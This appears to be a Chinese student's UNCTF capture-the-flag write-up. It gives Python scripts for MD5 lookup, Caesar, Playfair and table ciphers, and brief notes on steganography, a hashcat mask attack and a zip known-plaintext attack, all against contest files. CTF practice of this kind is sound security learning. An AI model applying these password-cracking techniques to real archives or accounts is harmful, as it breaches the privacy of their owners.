<h3 id="md5-1-西南科技大学及-misc-小心海最后一步脚本"><a href="#md5-1-西南科技大学及-misc-小心海最后一步脚本" class="headerlink" title="md5-1-西南科技大学及 misc 小心海最后一步脚本"></a>md5-1-西南科技大学<em>及 misc 小心海最后一步脚本</em></h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line"><span class="comment">######这里是MD5-1的脚本</span></span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">&quot;outben.txt&quot;</span>, <span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">line = file.readlines()</span><br><span class="line"><span class="comment">## rint(line)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line">    <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;g&#x27;</span>, <span class="string">&#x27;h&#x27;</span>, <span class="string">&#x27;i&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;k&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;m&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;o&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;q&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;u&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;w&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;y&#x27;</span>, <span class="string">&#x27;z&#x27;</span>, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;4&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;8&#x27;</span>, <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;&#123;&#x27;</span>, <span class="string">&#x27;&#125;&#x27;</span>, <span class="string">&#x27;_&#x27;</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> line:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">36</span>, <span class="number">1</span>):</span><br><span class="line">        md = md5(<span class="built_in">list</span>[j].encode()).hexdigest()</span><br><span class="line">        <span class="keyword">if</span> (i.strip(<span class="string">&#x27;\n&#x27;</span>) == md):</span><br><span class="line">            flags += <span class="built_in">list</span>[j]</span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;UNCTF&#123;&#x27;</span>+flag+<span class="string">&#x27;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">####################下面是misc小心海的脚本，因为很像，直接拿md5-1的改的</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">&quot;out.txt&quot;</span>, <span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">line = file.read()</span><br><span class="line">md = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">21</span>):</span><br><span class="line">    md.append(line[i * <span class="number">32</span>:(i + <span class="number">1</span>) * <span class="number">32</span>].lower())</span><br><span class="line"><span class="built_in">print</span>(md)</span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line">    <span class="string">&#x27;U&#x27;</span>, <span class="string">&#x27;N&#x27;</span>, <span class="string">&#x27;C&#x27;</span>, <span class="string">&#x27;T&#x27;</span>, <span class="string">&#x27;F&#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;g&#x27;</span>, <span class="string">&#x27;h&#x27;</span>, <span class="string">&#x27;i&#x27;</span>, <span class="string">&#x27;j&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;k&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;m&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;q&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;u&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;w&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;y&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;z&#x27;</span>, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;4&#x27;</span>, <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;8&#x27;</span>, <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;&#123;&#x27;</span>, <span class="string">&#x27;&#125;&#x27;</span>, <span class="string">&#x27;_&#x27;</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> md:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">44</span>, <span class="number">1</span>):</span><br><span class="line">        md = md5(<span class="built_in">list</span>[j].encode()).hexdigest()</span><br><span class="line">        <span class="keyword">if</span> (i == md):</span><br><span class="line">            flags += <span class="built_in">list</span>[j]</span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="md5-2-西南科技大学"><a href="#md5-2-西南科技大学" class="headerlink" title="md5-2-西南科技大学"></a>md5-2-西南科技大学</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">&quot;out.txt&quot;</span>, <span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">line = file.readlines()</span><br><span class="line"><span class="comment">## rint(line)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = [</span><br><span class="line">    <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;g&#x27;</span>, <span class="string">&#x27;h&#x27;</span>, <span class="string">&#x27;i&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;k&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;m&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;o&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;q&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;u&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;w&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;y&#x27;</span>, <span class="string">&#x27;z&#x27;</span>, <span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;3&#x27;</span>, <span class="string">&#x27;4&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;5&#x27;</span>, <span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;8&#x27;</span>, <span class="string">&#x27;9&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;&#123;&#x27;</span>, <span class="string">&#x27;&#125;&#x27;</span>, <span class="string">&#x27;_&#x27;</span>, <span class="string">&#x27;U&#x27;</span>, <span class="string">&#x27;N&#x27;</span>, <span class="string">&#x27;C&#x27;</span>, <span class="string">&#x27;T&#x27;</span>, <span class="string">&#x27;F&#x27;</span></span><br><span class="line">]</span><br><span class="line">flags = []</span><br><span class="line">t = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">39</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">44</span>, <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line">            f = <span class="built_in">int</span>(md5(<span class="built_in">list</span>[j].encode()).hexdigest(), <span class="number">16</span>)</span><br><span class="line">            hexed = <span class="built_in">hex</span>(f)[<span class="number">2</span>:]</span><br><span class="line">            <span class="keyword">if</span> (line[i].strip(<span class="string">&#x27;\n&#x27;</span>) == hexed):</span><br><span class="line">                flags += <span class="built_in">list</span>[j]</span><br><span class="line">                t.append(f)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            f = <span class="built_in">int</span>(md5(<span class="built_in">list</span>[j].encode()).hexdigest(), <span class="number">16</span>)</span><br><span class="line">            hexed = <span class="built_in">hex</span>(f ^ t[i - <span class="number">1</span>])[<span class="number">2</span>:]</span><br><span class="line">            <span class="keyword">if</span> (line[i].strip(<span class="string">&#x27;\n&#x27;</span>) == hexed):</span><br><span class="line">                flags += <span class="built_in">list</span>[j]</span><br><span class="line">                t.append(f)</span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>.join(flags)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="caesar-西南科技大学"><a href="#caesar-西南科技大学" class="headerlink" title="caesar-西南科技大学"></a>caesar-西南科技大学</h3><p>凯撒换表 base</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">## B6vAy&#123;dhd_AOiZ_KiMyLYLUa_JlL/HY&#125;</span></span><br><span class="line"><span class="comment">## UNCTF&#123;w0w_Th1s_d1fFerent_c4eSar&#125;</span></span><br><span class="line"><span class="comment">## ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</span></span><br><span class="line"><span class="comment">## K=+19</span></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">&quot;caesar.txt&quot;</span>, <span class="string">&quot;r&quot;</span>)</span><br><span class="line">t = []</span><br><span class="line">o = file.read()</span><br><span class="line"><span class="built_in">list</span> = <span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</span></span><br><span class="line"><span class="comment">## f = o.strip(&#x27;\n&#x27;)</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">27</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">64</span>):</span><br><span class="line">        <span class="built_in">print</span>(o[i])</span><br><span class="line">        <span class="keyword">if</span> o[i] == <span class="built_in">list</span>[j]:</span><br><span class="line">            <span class="keyword">if</span> j + <span class="number">19</span> &lt;= <span class="number">64</span>:</span><br><span class="line">                t.append(<span class="built_in">list</span>[j + <span class="number">19</span>])</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                t.append(<span class="built_in">list</span>[j + <span class="number">19</span> - <span class="number">64</span>])</span><br><span class="line">            <span class="comment"># print(t)</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">            <span class="comment"># (list[j + 19])</span></span><br><span class="line">            <span class="comment"># break</span></span><br><span class="line">        <span class="comment"># print(o[i], list[j])</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>.join(t)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<h3 id="Single-table-西南科技大学"><a href="#Single-table-西南科技大学" class="headerlink" title="Single table-西南科技大学"></a>Single table-西南科技大学</h3><p>paymfairx 密码修改<br>对称加密的流密码<br>根据 key 和 table 对应关系<br>列出新 table 如下图左侧<br>根据交叉对应关系得到右侧第三行<br>（第四行是我转小写尝试，还忘了个 T）<br>发现前面完美对应<br>后面却出现错误<br>看 koqw 像 know<br>know 啥哪<br>paymfairx 密码吗<br>略作改动：<br>UNCTF{GOD_YOU_KNOW_PLAYFAIR}<br>也不知道是故意需要修改的还是<br>我有那个细节错了<br>反正能做出来不管了</p>
<p><img src= "/img/5c5010e18e2f4d3a841b814c68ed26cb-1689254364821-289.png" alt="在这里插入图片描述"></p>
<h3 id="Multi-table-西南科技大学"><a href="#Multi-table-西南科技大学" class="headerlink" title="Multi table-西南科技大学"></a>Multi table-西南科技大学</h3><p>略修改加密算法<br>使其输出<code>table,base_table.index(flag[i])</code>来得到其他无关随机数的固定数据<br>可得出 UNCTF 加密得到的 SDCG<br>分别在<code>table[?、?、?、?][9、14、5、16]</code><br>由此可根据前四位密文逆推出<code>key = [9, 15, 23, 16]</code><br>这样解密所需的全部数据得到<br>编写解密脚本<br>加密：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">flowchart LR</span><br><span class="line">	加密 --&gt; flag</span><br><span class="line">	加密 --&gt; key</span><br><span class="line">	flag --&gt; base_table列 --&gt;table列</span><br><span class="line">	key --&gt; table行</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">flowchart LR</span><br><span class="line">	解密 --&gt;key</span><br><span class="line">	table行 --&gt;table列 --c--&gt; base_table列 --&gt; flag</span><br><span class="line">	key --&gt; table行</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> ascii_uppercase</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> b2a_hex,a2b_hex</span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">c = <span class="string">&#x27;SDCGW&#123;MPN_VHG_AXHU_GERA_SM_EZJNDBWN_UZHETD&#125;&#x27;</span></span><br><span class="line">base_table = [</span><br><span class="line">    <span class="string">&#x27;J&#x27;</span>, <span class="string">&#x27;X&#x27;</span>, <span class="string">&#x27;I&#x27;</span>, <span class="string">&#x27;S&#x27;</span>, <span class="string">&#x27;E&#x27;</span>, <span class="string">&#x27;C&#x27;</span>, <span class="string">&#x27;R&#x27;</span>, <span class="string">&#x27;Z&#x27;</span>, <span class="string">&#x27;L&#x27;</span>, <span class="string">&#x27;U&#x27;</span>, <span class="string">&#x27;K&#x27;</span>, <span class="string">&#x27;Q&#x27;</span>, <span class="string">&#x27;Y&#x27;</span>, <span class="string">&#x27;F&#x27;</span>, <span class="string">&#x27;N&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;V&#x27;</span>, <span class="string">&#x27;T&#x27;</span>, <span class="string">&#x27;P&#x27;</span>, <span class="string">&#x27;O&#x27;</span>, <span class="string">&#x27;G&#x27;</span>, <span class="string">&#x27;A&#x27;</span>, <span class="string">&#x27;H&#x27;</span>, <span class="string">&#x27;D&#x27;</span>, <span class="string">&#x27;W&#x27;</span>, <span class="string">&#x27;M&#x27;</span>, <span class="string">&#x27;B&#x27;</span></span><br><span class="line">]</span><br><span class="line">table = &#123;&#125;</span><br><span class="line">key = [<span class="number">9</span>, <span class="number">15</span>, <span class="number">23</span>, <span class="number">16</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">26</span>):</span><br><span class="line">    table[i]=ascii_uppercase[i:]+ascii_uppercase[:i]</span><br><span class="line">x = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c:</span><br><span class="line">    <span class="keyword">if</span> i <span class="keyword">in</span> ascii_uppercase:</span><br><span class="line">        bt_num = table[key[x%<span class="number">4</span>]].index(i)</span><br><span class="line">        flag += base_table[bt_num]</span><br><span class="line">        x += <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        flag += i</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<blockquote>
<p>以后找时间学学密码吧<br>之前一直想学一直没找到时间<br>靠着从 misc 那学的古典密码啥的，写了前几题的脚本<br>还有积累的脚本工具走到这<br>rsa 好多解应该是基础的 rsa，想拿工具试试来，苦于不咋会用于是 rsa 作罢<br>比完赛一定找大佬学学</p>
</blockquote>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="magic-word-西南科技大学"><a href="#magic-word-西南科技大学" class="headerlink" title="magic_word-西南科技大学"></a>magic_word-西南科技大学</h3><p>提示都送到嘴边了<br>直接零宽一把梭<br><img src= "/img/0fbd2358651b411291963e0fb443c135-1689254371995-292.png" alt="在这里插入图片描述"></p>
<h3 id="syslog-浙江师范大学"><a href="#syslog-浙江师范大学" class="headerlink" title="syslog-浙江师范大学"></a>syslog-浙江师范大学</h3><p>打开是个系统日志文件<br>寻找敏感信息例如<br>发现能搜索到 password<br><img src= "/img/6c47289892b34d779b7126e5f4f722e2-1689254374328-295.png" alt="在这里插入图片描述"><br>解 base 得到压缩包密码<br>秒出</p>
<h3 id="In-the-Morse-Garden-陆军工程大学"><a href="#In-the-Morse-Garden-陆军工程大学" class="headerlink" title="In_the_Morse_Garden-陆军工程大学"></a>In_the_Morse_Garden-陆军工程大学</h3><p>pdf 发现隐藏字符<br>赛博厨子构造一手<br><img src= "/img/72b442bc2ce34196b84d90bda5cc0160-1689254375586-298.png" alt="在这里插入图片描述"></p>
<h3 id="芝麻开门-广东海洋大学"><a href="#芝麻开门-广东海洋大学" class="headerlink" title="芝麻开门-广东海洋大学"></a>芝麻开门-广东海洋大学</h3><p>txt 下面有段 base<br>a2V5MQ&#x3D;&#x3D;<br>拿他当 lsb 密码，一把梭</p>
<h3 id="找得到我吗-闽南师范大学"><a href="#找得到我吗-闽南师范大学" class="headerlink" title="找得到我吗-闽南师范大学"></a>找得到我吗-闽南师范大学</h3><p>docx，隐藏字符，零宽都试过了<br>以为触及知识盲区了<br>放了发现已经很多解了<br>然后鼓起勇气看了下 xml<br>发现还真在里面</p>
<blockquote>
<p>misc 刷的文档题不多，还没大见过放在 xml 里的，我太菜了，还好知道这个知识点<br>但那道社什么社这么多解是真没想到，没对上脑电波？</p>
</blockquote>
<p><img src= "/img/91f5d9468dc3475a87e29aee97075cd0-1689254380855-301.png" alt="在这里插入图片描述"></p>
<h3 id="zhiyin"><a href="#zhiyin" class="headerlink" title="zhiyin"></a>zhiyin</h3><blockquote>
<p>小~黑子！</p>
</blockquote>
<p>hex 看篮球，一眼倒了<br>逆过来<br>Go_p1ay（那个 1 和 l 我当时都没发现，还有下划线也没划清楚，傻乎乎试了半天）<br>下半段 zhiyinhex 里发现<code>.-</code>莫斯出<br><img src= "/img/def310ca152344c6bd76b05d5a7d94ea-1689254383030-304.png" alt="在这里插入图片描述"></p>
<h3 id="巨鱼-河南理工大学"><a href="#巨鱼-河南理工大学" class="headerlink" title="巨鱼-河南理工大学"></a>巨鱼-河南理工大学</h3><p>上来 binwalk 下<br>出来个压缩包<br>对 fish 一通操作没找到密码<br>卡了半天去看别的题了<br>回来发现 png 有大问题<br>修改长宽高发现<code>无所谓我会出手</code><br>解压<br>文档有密码<br>去看图片</p>
<blockquote>
<p>我当时一眼苯环，服了，高中化学差点还给老师了</p>
</blockquote>
<p>本来以为氯化苯<br>输入 C6Cl6、汉语等都不对<br>静下心来一看，这 nm 不是苯环<br>再试 C6H6Cl6 还不对<br>脑洞一开 666<br>flag get√<br><img src= "/img/c00d5693a42e44f8a13e9548ea78faaf-1689254384944-307.png" alt="在这里插入图片描述"></p>
<h3 id="清和-fan-江西警察学院"><a href="#清和-fan-江西警察学院" class="headerlink" title="清和 fan-江西警察学院"></a>清和 fan-江西警察学院</h3><p><img src= "/img/753148ef28944da884964c67e763cb49-1689254386910-310.png" alt="在这里插入图片描述"><br>先是注释提示社工<br>很容易找到<br>解压缩<br>lsb 隐写<br><img src= "/img/b338b41d3b174d5b957cf794d9693c34-1689254388637-313.png" alt="在这里插入图片描述"><br>得到第二层密码<br>发现段 wav 文件<br>听了下，这频率感觉像 sstv</p>
<blockquote>
<p>vmware 的 Kali 前几个月转 wsl 了<br>kali 临时现装 sstv 出了点 bug<br>网上找了半天发现个手机软件</p>
</blockquote>
<blockquote>
<p>大晚上的 舍友都在打游戏，吵得很<br>于是去阳台识别<br>北方地区大晚上冷得很<br>识别了好几次<br>出来个微糊的</p>
</blockquote>
<p><img src= "/img/456f8bb9551647fb83cba89b5e7d8988-1689254390452-316.png" alt="在这里插入图片描述"><br>flag get√</p>
<blockquote>
<p>清和是吧，<del>举办了</del> 不是</p>
</blockquote>
<h3 id="剥茧抽丝-内蒙古警察职业学院"><a href="#剥茧抽丝-内蒙古警察职业学院" class="headerlink" title="剥茧抽丝-内蒙古警察职业学院"></a>剥茧抽丝-内蒙古警察职业学院</h3><p>nm 看到这注释，有多少人想到的是掩码<br>hashcat 跑了好几分钟<br>发现密码就是这<br><del>小丑竟是我自己</del><br><img src= "/img/9b3a6706674948618b93080de2645641-1689254393576-319.png" alt="在这里插入图片描述"><br>零宽换了几个方式，终于出了（文件零宽)</p>
<p><img src= "/img/d558234decca4bad958098f167bde455-1689254395921-322.png" alt="在这里插入图片描述"><br>结果，这不是下一层密码<br>看了眼 hint<br>crc 不一样<br>没对上脑电波<br>卡了几天？<br>想到，外面的比里面的大，能删减啊<br>把零宽的部分删了<br>发现正好<br>明文攻击<br><img src= "/img/66c33e1e04534881808eb055f1283f6e-1689254399345-325.png" alt="在这里插入图片描述"><br>然后再用上面一层零宽解出来的解密码<br>flag get<br>颓废~（这个题是拖得最长的，不乐)</p>
<h3 id="我小心海也绝非鳝类-中国计量大学现代科技学院"><a href="#我小心海也绝非鳝类-中国计量大学现代科技学院" class="headerlink" title="我小心海也绝非鳝类-中国计量大学现代科技学院"></a>我小心海也绝非鳝类-中国计量大学现代科技学院</h3><p>小心海说的话解 base92<br>一开始 ocr 识别的 c 成大写了<br>解出来有不可打印字符<br>检查了一遍改过来了</p>
<p>然后发现能 lsb EASYLSB<br>尝试把小心海的话当密码再解 lsb<br>发现串 16，开始误入歧途转了文件<br>想到小心海给我说的话<br>尝试 md5 转<br>切片 32 位<br>再改下 md5-1 的脚本&#x3D;&#x3D;细看的话去 cypto 区 md5-1 看吧<br>直出<br><img src= "/img/bc71bba99a2d4166b17d14b2bdb66917-1689254401620-328.png" alt="在这里插入图片描述"></p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>unctf</tag>
      </tags>
  </entry>
  <entry>
    <title>22年10月末</title>
    <url>/2023/07/22%E5%B9%B410%E6%9C%88%E6%9C%AB/</url>
    <content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
  <script id="hbeData" type="hbeData" data-hmacdigest="43b9e6dc09a8cc1b1d8c66fd408c77feb9aa763946ece7a4b0a72d21876dd7c3">709e820b2f5bb6db36bae87ed03a646f003cb0ce380f747ce4c88c56db22ab5d4185982fe20a41655de1394a5eceab58e21807493670c6615c8e8242ca46bffad9a1b81b645f9265d7dcb889f7879afeeacd2ac55f245aef6303c7f519362152373411c74c6b8780dce51847d73a6477709fd59641feb9af07d20f42a44b033ed79dda6ed6f98348586cf744d49d850e4ec5bf9d0a470c636f7e9ac709ccf9e657bb4b3f29d6a79cb3c4562fd379c8120eea9e54aa23d4b9e094ebd1a55157e901ea92fd7872064f902faf8f672f3dbacd1f701c31b68649f502bc58470b1a6ba2b456d4971c4296706af0632fe71ca5b775440d451ec69659cfd79a256f4310e0e6773c0f1c6b4867bd300c133430c964c2bc5c1b161aafe9f8c941c1e423024a0cd0bab8f1a978d2ba5ce5519199d2216ffd7b341a4f53763b017ebf0e5f4470746938144ee90076cb2f87fc64388b511de97200458a5adf9ce7031efc50c9f6cdefea07d2f60eb40d42b7ac3de7ec9be3b06cf621b5c7f9f7265011a8dc829a0c78b49751c8d2b40baefb9890b6c3e345c9e1e577129d4e1c8e6b0fdb812115f90d6434b94ed0e37b193ca6e074d94a34ac3efd7fe230dd850f156e84f2f4412f6ce15da32e12157eb6241d1a2b84624ae1dbf74c9393e0828656a1a4e9f20c1cf5b302ab34f904ea1ccab19bdaea57436d45ec541c213942d5ab5b22b8fa7d068ec382fac12604080c8fa82ebb295942a32a5ba6e1da87e93b9a9b4a8ed092cd22952f50f67ef0a91842214cb74dda4cf88bdf399678a9f7c3d708f9c8f05c0f56e3cd5e3016b0b081310c4507bbe92d8014926100fb764e069e91d57a08a0f55537ac7c092c44bea8768392f229647b5d5040c32f526fe9b8f43a19d3dfef44c06684220be3d7216512340bd91e5db00132921ac485b8cc127b1b2432b47ee66523ed7d703c49f70eab1568502c5e770b2431f9950809336b0d45dad9aaee3b460cb7e66f381a90ddcdf1443a1144152b13b7866d946e3ee1cfe67d5fea8679a2abba370acb31b61f71a4d1c77af78b3a84c78588be8b593cc26a78a5283b41fb88283b088127c17fdf8e52a4555324398b28e0f76c28065a29869c9ea15448e13318c93c29616b46bbf11c9ada95379294f02e14112f36457f96689eaf2da5adca49ad4fa0cb3e14b25b1419d58f7bba5f4f136b9404c417e7ab7348953df3058ef3451045d91fd7e7dc46096a74d05a8e6832ff9ab907663605b4b1ba37c43f1c10224734783d40ae0c34b7818f6c5a2dd996fc0288af2daf5e9210b89176c9852a5a790318576a6a9711f89bfc9f2a03dd69a06f4e94bcafd65ffd10c03fd6ccf383b31098240975bab3ec8d3f70212a39b691fd42bdeaa1ab2a670f7206f824c3f69e99b723e06be1b0a651134d7a7398b0ebbb2ae91893474afdab96157018abdadb3f174b2acf2e20ef477ab31314e25b23605fb72f5088ceefb5b1d771f8771f6f1f7b79e569512eac3864abf745248310e5d3bf8803faf5143d8ed5dd8b2452e0c5b14c2e3f5602a64675b96642fcd662021b92ce6dd58c1e563bcdb6c00fa3fab6f6f1b659b7f16d45c90481dc0dc4b38a7f544e480f47160de068b21849f752b80970c8be72443b8cc8797bb833ae9daf8eed02a52935a37d43209805180d7ee32c0b6aa514998dcf7ae6e389c34dead7c5318ba9b2ed468a0f55bafcd9762ea0ea741bced5d080d483c5fa4ea617aa82e36a36043ef2633539c06fbe4304786a8e548e170822f1817b0fdd370e82ff0d0c269707aaeb286e074ee1274a31a4e8366126c81b3e4e6b0d76e86798b87d5a03b12be8ebeb38c6be5de48d1978982101261055ef56ad2369bd5d512fe5dddf770a37220b145447e0798ba02ed90f0328d2f9046f469bf7e30882b334843c614b9ba10fdce47cc249140cbeec8ed72a3e712257dd387f6498b3622f2073654dadab2c29d6906a218af7dc87c9fab3432a33c25ee1273ad7322a42468eaea69ca5732af4feb47cbe94016ee49fd6a25f3de73955c33f77617ed90ae58ba6e96047a3b35c02909948d364cf0c993a7568e67eac3cebaf9231e7ff06151bdef0e0a5163187a071177583718e92d7abed9fbf057ad9306fd5b9a088452656977048e661e06bc74c5b53f2c790ca6d82748a3e5ac0044c0cd81e578ccac6374b21e92881d38d281451940c5016086c8fb5a1cd9c08102e09a56920da2ad9652e6e3d4ed2bd00eb4ac33d1874a4a98a1908e879fe805a8222942cd1017e7d0bfb44b4a75e541ce51b18d66b9dadc2989c1995e7de039147badfcb8f307c697af0bdbf864a6a9892b9894124bc4bfe22f3694d1b7029bbcea4fd925bc1194cd83d09f6cbfc52e27df52f41f64cedc01208253dddba27e7e6f9cd851048aa17eba5e81284a55a57366c9234ef609a3f94b2ff8d44519a93d14442142c304a4d00e5511fb7b1199399c12fa40eef4e53e619069139a35425b6a22056b2a30040b334f97667d48062374f4e1557dbd5f243ab236b54e92286dfe17474425aaef0fce4ed069651192cea7b488a84fe85caff20de608ec0c3ee2662c5860ba27d0e5717dcf1f8801a91cb82e8bbadea67f3d93b2949751369586288a07fd489092b39f2dbdbd5ed141d3a98da638526c5a4faf8c6db0431aad55a16ce5c69a221ccbfc65c1e09ed8c4b96bd0f4422ed509f3912c990c7e77940a0b2c06dcb7420e3ffb48a67bd342b9d93423822e0368117fe696f57a9bda131f0da74134028c43941f70bc32db4cb65ef2b0e84a5d26b1f7d16574b0ce4638e2954edb053a7ebd6c37a30e75144120c244f546163ab354469b712e3937c384e026c1da98572b0a603d9c0138c5729c66c31c1eea1557b8e85c453598c4575b92da2c602bb853ff19e51a860d16debdf95781329ab64ed8c7ec02adcc89014fffd63fed8701f585207d5edf7c215dc6a6493090d4f90438a30b923c4fc71da9